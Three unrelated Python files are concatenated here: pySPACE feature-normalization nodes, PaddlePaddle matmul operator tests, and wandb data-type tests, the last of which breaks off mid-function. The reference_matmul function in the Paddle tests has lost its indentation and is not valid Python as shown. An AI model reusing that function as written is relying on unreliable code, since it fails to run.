    :Revised (3): 2009/09/03
    """
    def __init__(self, outlier_percentage=0, **kwargs):
        super(OutlierFeatureNormalizationNode, self).__init__(**kwargs)
        self.set_permanent_attributes(outlier_percentage=outlier_percentage,
                                      samples=defaultdict(list))

    def collect_data(self, data):
        # gather the observed values per feature dimension
        for index, value in enumerate(data[0, :]):
            self.samples[index].append(value)

    def _stop_training(self):
        """ Computes the upper and lower boundary for normalization.

        The largest and smallest *outlier_percentage*/2 examples per
        feature dimension are ignored; the extremes of the remaining
        examples become the boundaries.
        """
        n_features = len(self.samples)
        self.lower_bounds = numpy.zeros((1, n_features))
        self.upper_bounds = numpy.zeros((1, n_features))
        lower_pct = self.outlier_percentage / 2
        for index, values in self.samples.iteritems():
            self.lower_bounds[0, index] = \
                scipy.stats.scoreatpercentile(values, lower_pct)
            self.upper_bounds[0, index] = \
                scipy.stats.scoreatpercentile(values, 100 - lower_pct)
        # free the collected samples
        self.samples = defaultdict(list)
        # name unification: translation/mult as used by the base class
        self.translation = self.lower_bounds[0, :]
        self.mult = 1 / (self.upper_bounds[0, :] - self.lower_bounds[0, :])
        # degenerate (constant) features get a neutral scaling of zero
        self.mult[numpy.isinf(self.mult)] = 0.0
        self.mult[numpy.isnan(self.mult)] = 0.0
class GaussianFeatureNormalizationNode(FeatureNormalizationNode):
    """ Transform the features, such that they have zero mean and variance one

    A class that normalizes each dimension of the feature
    vector so that it has zero mean and variance one.
    The relevant values are learned from the training set.

    **Exemplary Call**

    .. code-block:: yaml

        -
            node : Gaussian_Feature_Normalization

    :Author: Mario Krell (Mario.Krell@dfki.de)
    :Created: 2011/04/15
    """
    def __init__(self, **kwargs):
        # running statistics for the incremental (retrainable) variant
        self.n = 0
        self.mean_diff = None
        self.translation = None
        self.mult = None
        super(GaussianFeatureNormalizationNode, self).__init__(**kwargs)

    def _stop_training(self):
        """ Computes mean and std deviation of each feature"""
        if not self.is_retrainable():
            # batch statistics over all collected samples
            self.translation = numpy.mean(numpy.array(self.samples),axis=0)
            self.mult = numpy.std(numpy.array(self.samples),axis=0)
            for i in range(self.dim):
                # invert the std unless it is (numerically) zero
                if not(abs(self.mult[i]) < self.tolerance):
                    self.mult[i] = 1/self.mult[i]
                else:
                    self.mult[i] = 1
            self.n = len(self.samples)
            # clean up to save memory
            self.samples = []

    def _train(self, data):
        if not self.is_retrainable():
            super(GaussianFeatureNormalizationNode,self)._train(data)
        else:
            # incremental mean/variance update (Welford-style running
            # sums; sqr_sum accumulates n*variance)
            self.extract_feature_names(data)
            data_array = data.view(numpy.ndarray)
            data_array = data_array[0,:]
            if self.translation is None:
                self.translation = numpy.zeros(data_array.shape)
                self.sqr_sum = numpy.zeros(data_array.shape)
                self.mult = numpy.zeros(data_array.shape)
            self.n += 1
            delta = data_array - self.translation
            self.translation += 1.0*delta / self.n
            self.sqr_sum += 1.0*(self.n-1)/self.n*(delta**2)
            for i in range(self.dim):
                if not (self.sqr_sum[i] < self.tolerance):
                    self.mult[i] = numpy.sqrt(self.n/self.sqr_sum[i])

    def _inc_train(self, data, class_label=None):
        # incremental training simply reuses the retrainable _train path
        self._train(data)
class HistogramFeatureNormalizationNode(FeatureNormalizationNode):
    """ Transform the features, such that they have zero mean in
    the main bit in the histogram and variance one on that bit.

    The relevant values are learned from the training set.

    **Exemplary Call**

    .. code-block:: yaml

        -
            node : Histogram_Feature_Normalization

    :Author: Mario Krell (Mario.Krell@dfki.de)
    :Created: 2011/04/15
    """
    def _stop_training(self):
        """ Computes mean and std deviation of each feature

        For every feature, a 3-bin histogram is computed and only the
        values falling into the dominant bin contribute to the mean
        (translation) and standard deviation (inverted into mult).
        """
        # cleanup: removed dead locals (loop counter, max_sum) and
        # commented-out code from the original implementation
        mean = []
        std = []
        self.feature_values = numpy.array(self.samples).T
        for values in self.feature_values:
            hvalues, bins = numpy.histogram(values, bins=3)
            maxindex = hvalues.argmax()
            min_bound = bins[maxindex]
            max_bound = bins[maxindex + 1]
            # restrict statistics to the dominant histogram bin
            relevant_values = [value for value in values
                               if min_bound <= value <= max_bound]
            mean.append(numpy.mean(relevant_values))
            std.append(numpy.std(relevant_values))
        self.translation = numpy.array(mean)
        self.mult = numpy.array(std)
        for i in range(self.dim):
            # invert the std unless it is (numerically) zero
            if not (abs(self.mult[i]) < self.tolerance):
                self.mult[i] = 1 / self.mult[i]
            else:
                self.mult[i] = 1
        # Cleaning up...
        self.samples = []
        self.feature_values = []
@BooleanParameter("dimension_scale")
class EuclideanFeatureNormalizationNode(BaseNode):
    """ Normalize feature vectors to Euclidean norm with respect to dimensions

    **Parameters**

    :dimension_scale:
        Scale the output to ||x|| * dim(x)
        (to get bigger values)

        (*optional, default: False*)

    **Exemplary Call**

    .. code-block:: yaml

        -
            node : Euclidean_Feature_Normalization
            parameters :
                dimension_scale : True

    :Author: Mario Krell (Mario.Krell@dfki.de)
    :Created: 2011/04/15
    """
    def __init__(self, dimension_scale=False, **kwargs):
        super(EuclideanFeatureNormalizationNode, self).__init__(**kwargs)
        self.set_permanent_attributes(dim=None,
                                      dimension_scale=dimension_scale,
                                      feature_names=[])

    def _execute(self, data):
        """ Normalizes the samples vector to norm one """
        if self.feature_names == []:
            self.feature_names = data.feature_names
        elif self.feature_names != data.feature_names:
            raise InconsistentFeatureVectorsException(
                "Two feature vectors do not contain the same features!")
        x = data.view(numpy.ndarray)
        a = x[0, :]
        # fix: identity comparison instead of '== None'
        if self.dim is None:
            self.dim = len(a)
        norm = numpy.linalg.norm(a)
        if norm == 0:
            # zero vector: leave it unchanged instead of dividing by zero
            norm = 1
        a = a * numpy.longdouble(1) / norm
        if self.dimension_scale:
            # scale by the number of dimensions to obtain larger values
            return FeatureVector([len(a) * a], self.feature_names)
        else:
            return FeatureVector([a], self.feature_names)

    def store_state(self, result_dir, index=None):
        """ Stores this node in the given directory *result_dir* """
        if self.store:
            pass
class InfinityNormFeatureNormalizationNode(BaseNode):
    """ Normalize feature vectors with infinity norm to [-1,1]

    **Parameters**

    **Exemplary Call**

    .. code-block:: yaml

        -
            node : I_FN

    :Author: Mario Krell and Marc Tabie (Mario.Krell and Marc.Tabie@dfki.de)
    :Created: 2012/07/16
    """
    def __init__(self, **kwargs):
        super(InfinityNormFeatureNormalizationNode, self).__init__(**kwargs)

    def _execute(self, data):
        """ Normalizes the samples vector to inf norm one"""
        # cast to float first so integer features divide correctly
        raw = data.view(numpy.ndarray)[0, :].astype(numpy.double)
        peak = numpy.max(numpy.abs(raw))
        if peak == 0:
            # zero vector: keep it unchanged instead of dividing by zero
            peak = 1
        raw /= peak
        return FeatureVector([raw], data.feature_names)
# Infinity and Euclidean norm are covered by other nodes.
# Other possible norms then the ones suggested here
# are not that common or relevant.
@ChoiceParameter("order", choices=["-inf", 0, 1, 3, 4])
class NumpyFeatureNormalizationNode(BaseNode):
    """ Normalize feature vectors to any numpy vector norm

    **Parameters**

    :order:
        Order of the norm, used by numpy (ord-parameter by numpy).
        The default is the 1-Norm normalization.

        :inf: max(abs(x))
        :-inf: min(abs(x))
        :0: sum(x != 0)
        :other: sum(abs(x)**ord)**(1./ord)

        (*optional, default: 1*)

    **Exemplary Call**

    .. code-block:: yaml

        -
            node : N_FN
            parameters :
                order : 42

    :Author: Mario Michael Krell (Mario.Krell@dfki.de)
    :Created: 2017/03/19
    """
    def __init__(self, order=1, **kwargs):
        super(NumpyFeatureNormalizationNode, self).__init__(**kwargs)
        # map the textual infinity specifiers onto numpy constants,
        # everything else is interpreted as a numeric order
        if order == "inf":
            resolved = numpy.inf
        elif order == "-inf":
            resolved = -numpy.inf
        else:
            resolved = float(order)
        self.set_permanent_attributes(ord=resolved,
                                      feature_names=None)

    def _execute(self, data):
        """ Normalizes the samples vector to norm one """
        if self.feature_names is None:
            self.feature_names = data.feature_names
        elif self.feature_names != data.feature_names:
            raise InconsistentFeatureVectorsException(
                "Two feature vectors do not contain the same features!")
        sample = data.view(numpy.ndarray)[0, :]
        norm = numpy.linalg.norm(sample, self.ord)
        if norm == 0:
            # zero-norm vector: keep it unchanged instead of dividing by zero
            norm = 1
        scaled = sample * numpy.longdouble(1) / norm
        return FeatureVector([scaled], self.feature_names)

    def store_state(self, result_dir, index=None):
        """ Stores this node in the given directory *result_dir* """
        if self.store:
            pass
# Backwards-compatible short names under which these nodes can be
# referenced in node-chain specifications.
_NODE_MAPPING = {"Feature_Normalization": OutlierFeatureNormalizationNode,
                 "Outlier_Feature_Normalization": OutlierFeatureNormalizationNode,
                 "FN": OutlierFeatureNormalizationNode,
                 "O_FN": OutlierFeatureNormalizationNode,
                 "Euclidean_Feature_Normalization": EuclideanFeatureNormalizationNode,
                 "E_FN": EuclideanFeatureNormalizationNode,
                 "Gaussian_Feature_Normalization": GaussianFeatureNormalizationNode,
                 "G_FN": GaussianFeatureNormalizationNode,
                 "Histogram_Feature_Normalization": HistogramFeatureNormalizationNode,
                 "H_FN": HistogramFeatureNormalizationNode,
                 "I_FN": InfinityNormFeatureNormalizationNode,
                 "N_FN": NumpyFeatureNormalizationNode,
                 }
| |
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import paddle.fluid.core as core
import unittest
import numpy as np
from op_test import OpTest
import paddle
import paddle.fluid as fluid
from paddle.fluid import Program, program_guard
def generate_compatible_shapes(dim_X, dim_Y, transpose_X, transpose_Y):
    """Build multiplication-compatible (shape_X, shape_Y) for a matmul case.

    1-D operands collapse to a single vector dimension; 3-D operands get
    a leading batch dimension of 2.  K degenerates to 1 whenever a 1-D
    operand is transposed, keeping the shapes compatible.
    """
    batch_size, m_dim, n_dim, k_dim = 2, 3, 4, 5
    if (dim_X == 1 and transpose_X) or (dim_Y == 1 and transpose_Y):
        k_dim = 1
    if dim_X == 1:
        shape_X = [m_dim] if transpose_X else [k_dim]
    if dim_Y == 1:
        shape_Y = [n_dim] if transpose_Y else [k_dim]
    if dim_X >= 2:
        shape_X = [k_dim, m_dim] if transpose_X else [m_dim, k_dim]
        if dim_X == 3:
            shape_X = [batch_size] + shape_X
    if dim_Y >= 2:
        shape_Y = [n_dim, k_dim] if transpose_Y else [k_dim, n_dim]
        if dim_Y == 3:
            shape_Y = [batch_size] + shape_Y
    return shape_X, shape_Y
def reference_matmul(X, Y, transpose_X=False, transpose_Y=False):
"""Reference forward implementation using np.matmul."""
# np.matmul does not support the transpose flags, so we manually
# transpose X and Y appropriately.
if transpose_X:
if X.ndim == 1:
X = X.reshape((X.size, 1))
elif X.ndim == 2:
X = X.T
else:
dim = [i for i in range(len(X.shape))]
dim[-1], dim[len(X.shape) - 2] = dim[len(X.shape) - 2], dim[-1]
X = np.transpose(X, tuple(dim))
if transpose_Y:
if Y.ndim == 1:
Y = Y.reshape((1, Y.size))
else:
dim = [i for i in range(len(Y.shape))]
dim[-1], dim[len(Y.shape) - 2] = dim[len(Y.shape) - 2], dim[-1]
Y = np.transpose(Y, tuple(dim))
Out = np.matmul(X, Y)
if not Out.shape:
# We do not support 0-dimensional Tensors (scalars). So where
# np.matmul outputs a scalar, we must convert to a Tensor of
# shape (1, ) instead.
# Everywhere else, we are compatible with np.matmul.
Out = np.array([Out], dtype="float32")
return Out
class Generator(object):
    """Mixin combined with OpTest subclasses to test one matmul shape combo.

    Subclasses supply shape_X, shape_Y, transpose_X and transpose_Y as
    class attributes; the expected output comes from reference_matmul.
    """
    def setUp(self):
        self.op_type = "matmul"
        x_mat = np.random.random(self.shape_X).astype("float32")
        y_mat = np.random.random(self.shape_Y).astype("float32")
        expected = reference_matmul(x_mat, y_mat,
                                    self.transpose_X, self.transpose_Y)
        self.inputs = {'X': x_mat, 'Y': y_mat}
        self.attrs = {
            'transpose_X': self.transpose_X,
            'transpose_Y': self.transpose_Y
        }
        self.outputs = {'Out': expected}

    def test_check_output(self):
        self.check_output()

    def test_check_grad_normal(self):
        self.check_grad(['X', 'Y'], 'Out', max_relative_error=1e-3)

    def test_check_grad_ignore_x(self):
        self.check_grad(
            ['Y'], 'Out', max_relative_error=1e-3, no_grad_set=set("X"))

    def test_check_grad_ignore_y(self):
        self.check_grad(
            ['X'], 'Out', max_relative_error=1e-3, no_grad_set=set('Y'))
class TestMatmulOpError(unittest.TestCase):
    """Input validation checks for fluid.layers.matmul."""

    def test_errors(self):
        with program_guard(Program(), Program()):
            # non-Variable inputs are rejected
            scalar_input = 12
            self.assertRaises(TypeError, fluid.layers.matmul,
                              scalar_input, scalar_input)
            # int32 inputs are rejected (dtype must be float32/float64)
            int_var = fluid.layers.data(
                name='input2', shape=[10, 10], dtype="int32")
            self.assertRaises(TypeError, fluid.layers.matmul,
                              int_var, int_var)
            # float16 inputs are accepted and must not raise
            half_var = fluid.layers.data(
                name='input3', shape=[2, 2], dtype="float16")
            fluid.layers.matmul(half_var, half_var)
# Negative dimension generation
def generate_negative_dims(in_shape):
    """Return all variants of *in_shape* with 1..len dims replaced by -1.

    -1 marks a dimension whose size must be inferred by the framework.
    Variants are ordered by how many dimensions are masked.
    """
    from itertools import combinations
    size = len(in_shape)
    masked_shapes = []
    for count in range(1, size + 1):
        for chosen in combinations(range(size), count):
            masked_shapes.append([-1 if i in chosen else in_shape[i]
                                  for i in range(size)])
    return masked_shapes
# Build program with inputs sizes that contain negative numbers
def test_negative_dims_program(obj):
    """Run matmul with every -1 (inferred) dim variant of obj's shapes.

    For each variant the static output shape is compared against the
    numpy reference, then the program is executed and the numeric result
    checked against reference_matmul.
    """
    for shape_x in generate_negative_dims(obj.shape_X):
        for shape_y in generate_negative_dims(obj.shape_Y):
            X = np.random.random(obj.shape_X).astype("float32")
            Y = np.random.random(obj.shape_Y).astype("float32")
            Ref = reference_matmul(X, Y, obj.transpose_X, obj.transpose_Y)
            with program_guard(Program(), Program()):
                x = fluid.data(name='x', shape=shape_x, dtype='float32')
                y = fluid.data(name='y', shape=shape_y, dtype='float32')
                output = fluid.layers.matmul(x, y, obj.transpose_X,
                                             obj.transpose_Y)
                obj.assertEqual(len(Ref.shape), len(output.shape))
                for idx in range(len(Ref.shape)):
                    # -1 in the static shape means "inferred at run time"
                    if output.shape[idx] != -1:
                        obj.assertEqual(Ref.shape[idx], output.shape[idx])
                exe = fluid.Executor(fluid.CPUPlace())
                res, = exe.run(fluid.default_main_program(),
                               feed={'x': X,
                                     'y': Y},
                               fetch_list=[output])
                # bug fix: the allclose result was computed but never
                # asserted, so numeric mismatches went undetected
                obj.assertTrue(np.allclose(res, Ref, atol=1e-5))
# Generate program api cases for all negative possibilities
def api_test(dim_x, dim_y, trans_x, trans_y):
    """Register a TestCase exercising the matmul program API (with
    negative/inferred dims) for one dim/transpose combination."""
    test_name = ('TestMatMulAPI_dimX_{}_dim_Y_{}_transX_{}_transY_{}'.format(
        dim_x, dim_y, trans_x, trans_y))
    shape_x, shape_y = generate_compatible_shapes(dim_x, dim_y, trans_x,
                                                  trans_y)
    globals()[test_name] = type(test_name, (unittest.TestCase, ), {
        'shape_X': shape_x,
        'shape_Y': shape_y,
        'transpose_X': trans_x,
        'transpose_Y': trans_y,
        # bug fix: the attribute was misspelled 'test_propram'
        'test_program': test_negative_dims_program,
    })
# Generate operators cases for all possibilities
def inject_test(dim_x, dim_y, trans_x, trans_y):
    """Register one matmul OpTest class for a dim/transpose combination."""
    case_name = 'TestMatMulOp_dimX_{}_dim_Y_{}_transX_{}_transY_{}'.format(
        dim_x, dim_y, trans_x, trans_y)
    shape_x, shape_y = generate_compatible_shapes(dim_x, dim_y,
                                                  trans_x, trans_y)
    members = {
        'shape_X': shape_x,
        'shape_Y': shape_y,
        'transpose_X': trans_x,
        'transpose_Y': trans_y,
    }
    globals()[case_name] = type(case_name, (Generator, OpTest), members)
# Register operator and program-API test cases for every combination of
# operand rank (1-3) and transpose flags.
for case_dim_x in (1, 2, 3):
    for case_dim_y in (1, 2, 3):
        for case_trans_x in (False, True):
            for case_trans_y in (False, True):
                inject_test(case_dim_x, case_dim_y, case_trans_x, case_trans_y)
                api_test(case_dim_x, case_dim_y, case_trans_x, case_trans_y)
# Test case more batch_size and N, M, K
def generate_compatible_shapes_batch(dim_X, dim_Y, transpose_X, transpose_Y,
                                     batch_size):
    """Like generate_compatible_shapes, but 3-D operands get a leading
    batch dimension of *batch_size*.

    Bug fix: batch_size was accepted but ignored — the batch dimension
    was hard-coded to 2, making this function a duplicate of
    generate_compatible_shapes.
    """
    BATCH_SIZE = batch_size  # fix: honor the caller-supplied batch size
    M = 3
    N = 4
    K = 5
    # a transposed 1-D operand forces K to 1 to keep shapes compatible
    if (dim_X == 1 and transpose_X) or (dim_Y == 1 and transpose_Y):
        K = 1
    if dim_X == 1:
        if transpose_X:
            shape_X = [M]
        else:
            shape_X = [K]
    if dim_Y == 1:
        if transpose_Y:
            shape_Y = [N]
        else:
            shape_Y = [K]
    if dim_X >= 2:
        if transpose_X:
            shape_X = [K, M]
        else:
            shape_X = [M, K]
    if dim_X == 3:
        shape_X = [BATCH_SIZE] + shape_X
    if dim_Y >= 2:
        if transpose_Y:
            shape_Y = [N, K]
        else:
            shape_Y = [K, N]
    if dim_Y == 3:
        shape_Y = [BATCH_SIZE] + shape_Y
    return shape_X, shape_Y
# Test case: n-dim matmul shapes (leading batch dims fixed at 2).
def generate_compatible_shapes_ndim(dim, transpose_X, transpose_Y):
    """Return (shape_X, shape_Y) for an n-dim matmul with `dim - 2` batch dims."""
    M, N, K = 2, 4, 3
    batch = [2] * (dim - 2)
    shape_X = batch + ([K, M] if transpose_X else [M, K])
    shape_Y = batch + ([N, K] if transpose_Y else [K, N])
    return shape_X, shape_Y
# Test case: n-dim (dim > 3) operator tests.
# NOTE: these are plain module-level statements; the loop variables
# (transpose_X etc.) deliberately remain in module scope afterwards.
for dim in [4]:
    for transpose_X in [False, True]:
        for transpose_Y in [False, True]:
            test_name = (
                'TestMatMulOp_dimX_{}_dim_Y_{}_transX_{}_transY_{}'.format(
                    dim, dim, transpose_X, transpose_Y))
            shape_X, shape_Y = generate_compatible_shapes_ndim(dim, transpose_X,
                                                               transpose_Y)
            # Dynamically register a test class so unittest discovers it.
            globals()[test_name] = type(test_name, (Generator, OpTest), {
                'shape_X': shape_X,
                'shape_Y': shape_Y,
                'transpose_X': transpose_X,
                'transpose_Y': transpose_Y,
            })
class API_TestMm(unittest.TestCase):
    """Static-graph and dygraph checks for paddle.mm."""

    def test_out(self):
        """paddle.mm of two length-2 vectors matches the numpy dot product."""
        with fluid.program_guard(fluid.Program()):
            x = fluid.data(name="x", shape=[2], dtype="float64")
            y = fluid.data(name='y', shape=[2], dtype='float64')
            # Removed dead local: an unused fluid.data(name="output") var was
            # declared here but never fed or fetched.
            result = paddle.mm(x, y)
            exe = fluid.Executor(fluid.CPUPlace())
            data1 = np.random.rand(2)
            data2 = np.random.rand(2)
            np_res = exe.run(feed={'x': data1, 'y': data2}, fetch_list=[result])
            expected_result = np.matmul(
                data1.reshape(1, 2), data2.reshape(2, 1))
            self.assertTrue(
                np.allclose(
                    np_res, expected_result, atol=1e-5),
                "two value is{}\n{}, check diff!".format(np_res, expected_result))

    def test_dygraph_without_out(self):
        """Eager-mode paddle.mm matches numpy matmul."""
        device = fluid.CPUPlace()
        with fluid.dygraph.guard(device):
            input_array1 = np.random.rand(3, 4).astype("float64")
            input_array2 = np.random.rand(4, 3).astype("float64")
            data1 = fluid.dygraph.to_variable(input_array1)
            data2 = fluid.dygraph.to_variable(input_array2)
            out = paddle.mm(data1, data2)
            expected_result = np.matmul(input_array1, input_array2)
            self.assertTrue(np.allclose(expected_result, out.numpy()))
class Test_API_Matmul(unittest.TestCase):
    """Dygraph check for paddle.matmul."""

    def test_dygraph_without_out(self):
        """Eager-mode paddle.matmul matches numpy matmul."""
        place = fluid.CPUPlace()
        with fluid.dygraph.guard(place):
            lhs = np.random.rand(3, 4).astype("float64")
            rhs = np.random.rand(4, 3).astype("float64")
            lhs_var = fluid.dygraph.to_variable(lhs)
            rhs_var = fluid.dygraph.to_variable(rhs)
            product = paddle.matmul(lhs_var, rhs_var)
            self.assertTrue(np.allclose(np.matmul(lhs, rhs), product.numpy()))
class API_TestMmError(unittest.TestCase):
    """Shape-validation error checks for paddle.mm."""

    def test_errors(self):
        def test_error1():
            # Inner dimensions mismatch (2 vs 3): must raise.
            with fluid.program_guard(fluid.Program(), fluid.Program()):
                data1 = fluid.data(name="data1", shape=[10, 2], dtype="float32")
                data2 = fluid.data(name="data2", shape=[3, 10], dtype="float32")
                paddle.mm(data1, data2)

        self.assertRaises(ValueError, test_error1)

        def test_error2():
            # Compatible batched shapes with a -1 (dynamic) batch dim: must
            # NOT raise, hence it is called directly, not via assertRaises.
            with fluid.program_guard(fluid.Program(), fluid.Program()):
                data1 = fluid.data(
                    name="data1", shape=[-1, 10, 2], dtype="float32")
                data2 = fluid.data(
                    name="data2", shape=[-1, 2, 10], dtype="float32")
                paddle.mm(data1, data2)

        test_error2()

        def test_error3():
            # Mismatched static batch dims (10 vs 3): must raise.
            with fluid.program_guard(fluid.Program(), fluid.Program()):
                data1 = fluid.data(
                    name="data1", shape=[10, 10, 2], dtype="float32")
                data2 = fluid.data(
                    name="data2", shape=[3, 2, 10], dtype="float32")
                paddle.mm(data1, data2)

        self.assertRaises(ValueError, test_error3)


if __name__ == "__main__":
    unittest.main()
| |
import wandb
from wandb import data_types
from wandb.sdk.data_types.base_types.media import _numpy_arrays_to_lists
import numpy as np
import pytest
import PIL
import os
import six
import sys
import glob
import platform
from click.testing import CliRunner
from . import utils
from .utils import dummy_data
import matplotlib
import rdkit.Chem
from wandb import Api
import time
matplotlib.use("Agg")
import matplotlib.pyplot as plt # noqa: E402
# 1-D random sample shared by the histogram tests below.
data = np.random.randint(255, size=(1000))


@pytest.fixture
def api(runner):
    """Public-API client fixture (backed by the mock server)."""
    return Api()
def test_wb_value(live_mock_server, test_settings):
    """Exercise the WBValue base-class contract: abstract methods raise,
    init_from_json dispatches on "_type", and equality semantics."""
    run = wandb.init(settings=test_settings)
    local_art = wandb.Artifact("N", "T")
    public_art = run.use_artifact("N:latest")
    wbvalue = data_types.WBValue()
    # The base class itself must not serialize/deserialize.
    with pytest.raises(NotImplementedError):
        wbvalue.to_json(local_art)
    with pytest.raises(NotImplementedError):
        data_types.WBValue.from_json({}, public_art)
    assert data_types.WBValue.with_suffix("item") == "item.json"
    # init_from_json picks the concrete subclass from the "_type" field.
    table = data_types.WBValue.init_from_json(
        {
            "_type": "table",
            "data": [[]],
            "columns": [],
            "column_types": wandb.data_types._dtypes.TypedDictType({}).to_json(),
        },
        public_art,
    )
    assert isinstance(table, data_types.WBValue) and isinstance(
        table, wandb.data_types.Table
    )
    type_mapping = data_types.WBValue.type_mapping()
    assert all(
        [issubclass(type_mapping[key], data_types.WBValue) for key in type_mapping]
    )
    # Equal to itself, distinct from a fresh base instance.
    assert wbvalue == wbvalue
    assert wbvalue != data_types.WBValue()
    run.finish()
@pytest.mark.skipif(sys.version_info >= (3, 10), reason="no pandas py3.10 wheel")
def test_log_dataframe(live_mock_server, test_settings):
    """Logging a DataFrame produces exactly one backing artifact."""
    import pandas as pd

    run = wandb.init(settings=test_settings)
    cv_results = pd.DataFrame(data={"test_col": [1, 2, 3], "test_col2": [4, 5, 6]})
    run.log({"results_df": cv_results})
    run.finish()
    ctx = live_mock_server.get_ctx()
    assert len(ctx["artifacts"]) == 1
def test_raw_data():
    """Raw sequence input gets the default 64-bin histogram."""
    wbhist = wandb.Histogram(data)
    assert len(wbhist.histogram) == 64


def test_np_histogram():
    """np.histogram output (10 bins by default) is accepted as-is."""
    wbhist = wandb.Histogram(np_histogram=np.histogram(data))
    assert len(wbhist.histogram) == 10


def test_manual_histogram():
    """A hand-built (counts, bin-edges) pair is accepted."""
    wbhist = wandb.Histogram(np_histogram=([1, 2, 4], [3, 10, 20, 0]))
    assert len(wbhist.histogram) == 3


def test_invalid_histogram():
    """Mismatched counts/edges lengths must raise ValueError."""
    with pytest.raises(ValueError):
        wandb.Histogram(np_histogram=([1, 2, 3], [1]))
# Blank 28x28 array reused as the image payload throughout the image tests.
image = np.zeros((28, 28))


def test_captions():
    """all_captions collects per-image captions in order."""
    wbone = wandb.Image(image, caption="Cool")
    wbtwo = wandb.Image(image, caption="Nice")
    assert wandb.Image.all_captions([wbone, wbtwo]) == ["Cool", "Nice"]


def test_bind_image(mocked_run):
    """Binding an image to a run marks it as bound."""
    wb_image = wandb.Image(image)
    wb_image.bind_to_run(mocked_run, "stuff", 10)
    assert wb_image.is_bound()
# Bounding-box dict populated with every supported key, including the
# optional ones ("box_caption", "scores").
full_box = {
    "position": {"middle": (0.5, 0.5), "width": 0.1, "height": 0.2},
    "class_id": 2,
    "box_caption": "This is a big car",
    "scores": {"acc": 0.3},
}
# Helper: return a copy of the dict with one key removed (input untouched).
def dissoc(d, key):
    """Return a shallow copy of *d* without *key* (KeyError if absent)."""
    trimmed = dict(d)
    del trimmed[key]
    return trimmed
# Variants of full_box with each optional key dropped in turn.
optional_keys = ["box_caption", "scores"]
boxes_with_removed_optional_args = [dissoc(full_box, k) for k in optional_keys]
def test_image_accepts_other_images(mocked_run):
    """An Image constructed from another Image compares equal to it."""
    image_a = wandb.Image(np.random.random((300, 300, 3)))
    image_b = wandb.Image(image_a)
    assert image_a == image_b


def test_image_accepts_bounding_boxes(mocked_run):
    """A bound image with boxes writes the box media file under the run dir."""
    img = wandb.Image(image, boxes={"predictions": {"box_data": [full_box]}})
    img.bind_to_run(mocked_run, "images", 0)
    img_json = img.to_json(mocked_run)
    path = img_json["boxes"]["predictions"]["path"]
    assert os.path.exists(os.path.join(mocked_run.dir, path))


def test_image_accepts_bounding_boxes_optional_args(mocked_run):
    """Boxes missing optional keys (caption/scores) still serialize."""
    img = data_types.Image(
        image, boxes={"predictions": {"box_data": boxes_with_removed_optional_args}}
    )
    img.bind_to_run(mocked_run, "images", 0)
    img_json = img.to_json(mocked_run)
    path = img_json["boxes"]["predictions"]["path"]
    assert os.path.exists(os.path.join(mocked_run.dir, path))
# Segmentation mask: integer class ids plus a class-label mapping.
standard_mask = {
    "mask_data": np.array([[1, 2, 2, 2], [2, 3, 3, 4], [4, 4, 4, 4], [4, 4, 4, 2]]),
    "class_labels": {1: "car", 2: "pedestrian", 3: "tractor", 4: "cthululu"},
}


def test_image_accepts_masks(mocked_run):
    """A bound image with a mask writes the mask media file."""
    img = wandb.Image(image, masks={"overlay": standard_mask})
    img.bind_to_run(mocked_run, "images", 0)
    img_json = img.to_json(mocked_run)
    path = img_json["masks"]["overlay"]["path"]
    assert os.path.exists(os.path.join(mocked_run.dir, path))


def test_image_accepts_masks_without_class_labels(mocked_run):
    """Masks still serialize when class_labels is omitted."""
    img = wandb.Image(image, masks={"overlay": dissoc(standard_mask, "class_labels")})
    img.bind_to_run(mocked_run, "images", 0)
    img_json = img.to_json(mocked_run)
    path = img_json["masks"]["overlay"]["path"]
    assert os.path.exists(os.path.join(mocked_run.dir, path))
def test_cant_serialize_to_other_run(mocked_run, test_settings):
    """This isn't implemented yet. Should work eventually."""
    other_run = wandb.wandb_sdk.wandb_run.Run(settings=test_settings)
    other_run._set_backend(mocked_run._backend)
    wb_image = wandb.Image(image)
    wb_image.bind_to_run(mocked_run, "stuff", 10)
    # Serializing against a run other than the one it is bound to must fail.
    with pytest.raises(AssertionError):
        wb_image.to_json(other_run)


def test_image_seq_to_json(mocked_run):
    """seq_to_json writes the media file and reports count/size metadata."""
    wb_image = wandb.Image(image)
    wb_image.bind_to_run(mocked_run, "test", 0, 0)
    meta = wandb.Image.seq_to_json([wb_image], mocked_run, "test", 0)
    assert os.path.exists(
        os.path.join(mocked_run.dir, "media", "images", "test_0_0.png")
    )
    meta_expected = {
        "_type": "images/separated",
        "count": 1,
        "height": 28,
        "width": 28,
    }
    assert utils.subdict(meta, meta_expected) == meta_expected
def test_max_images(caplog, mocked_run):
    """Logging more images than MAX_ITEMS truncates the sequence to the cap."""
    large_image = np.random.randint(255, size=(10, 10))
    large_list = [wandb.Image(large_image)] * 200
    large_list[0].bind_to_run(mocked_run, "test2", 0, 0)
    meta = wandb.Image.seq_to_json(
        wandb.wandb_sdk.data_types.utils._prune_max_seq(large_list),
        mocked_run,
        "test2",
        0,
    )
    expected = {
        "_type": "images/separated",
        "count": data_types.Image.MAX_ITEMS,
        "height": 10,
        "width": 10,
    }
    path = os.path.join(mocked_run.dir, "media/images/test2_0_0.png")
    assert utils.subdict(meta, expected) == expected
    # Reuse the computed path (it was a dead local rebuilt inline before).
    assert os.path.exists(path)
def test_audio_sample_rates():
    """sample_rates collects per-clip rates; missing rate raises ValueError."""
    audio1 = np.random.uniform(-1, 1, 44100)
    audio2 = np.random.uniform(-1, 1, 88200)
    wbaudio1 = wandb.Audio(audio1, sample_rate=44100)
    wbaudio2 = wandb.Audio(audio2, sample_rate=88200)
    assert wandb.Audio.sample_rates([wbaudio1, wbaudio2]) == [44100, 88200]
    # test with missing sample rate
    with pytest.raises(ValueError):
        wandb.Audio(audio1)


def test_audio_durations():
    """Duration is sample count divided by sample rate."""
    audio1 = np.random.uniform(-1, 1, 44100)
    audio2 = np.random.uniform(-1, 1, 88200)
    wbaudio1 = wandb.Audio(audio1, sample_rate=44100)
    wbaudio2 = wandb.Audio(audio2, sample_rate=44100)
    assert wandb.Audio.durations([wbaudio1, wbaudio2]) == [1.0, 2.0]


def test_audio_captions():
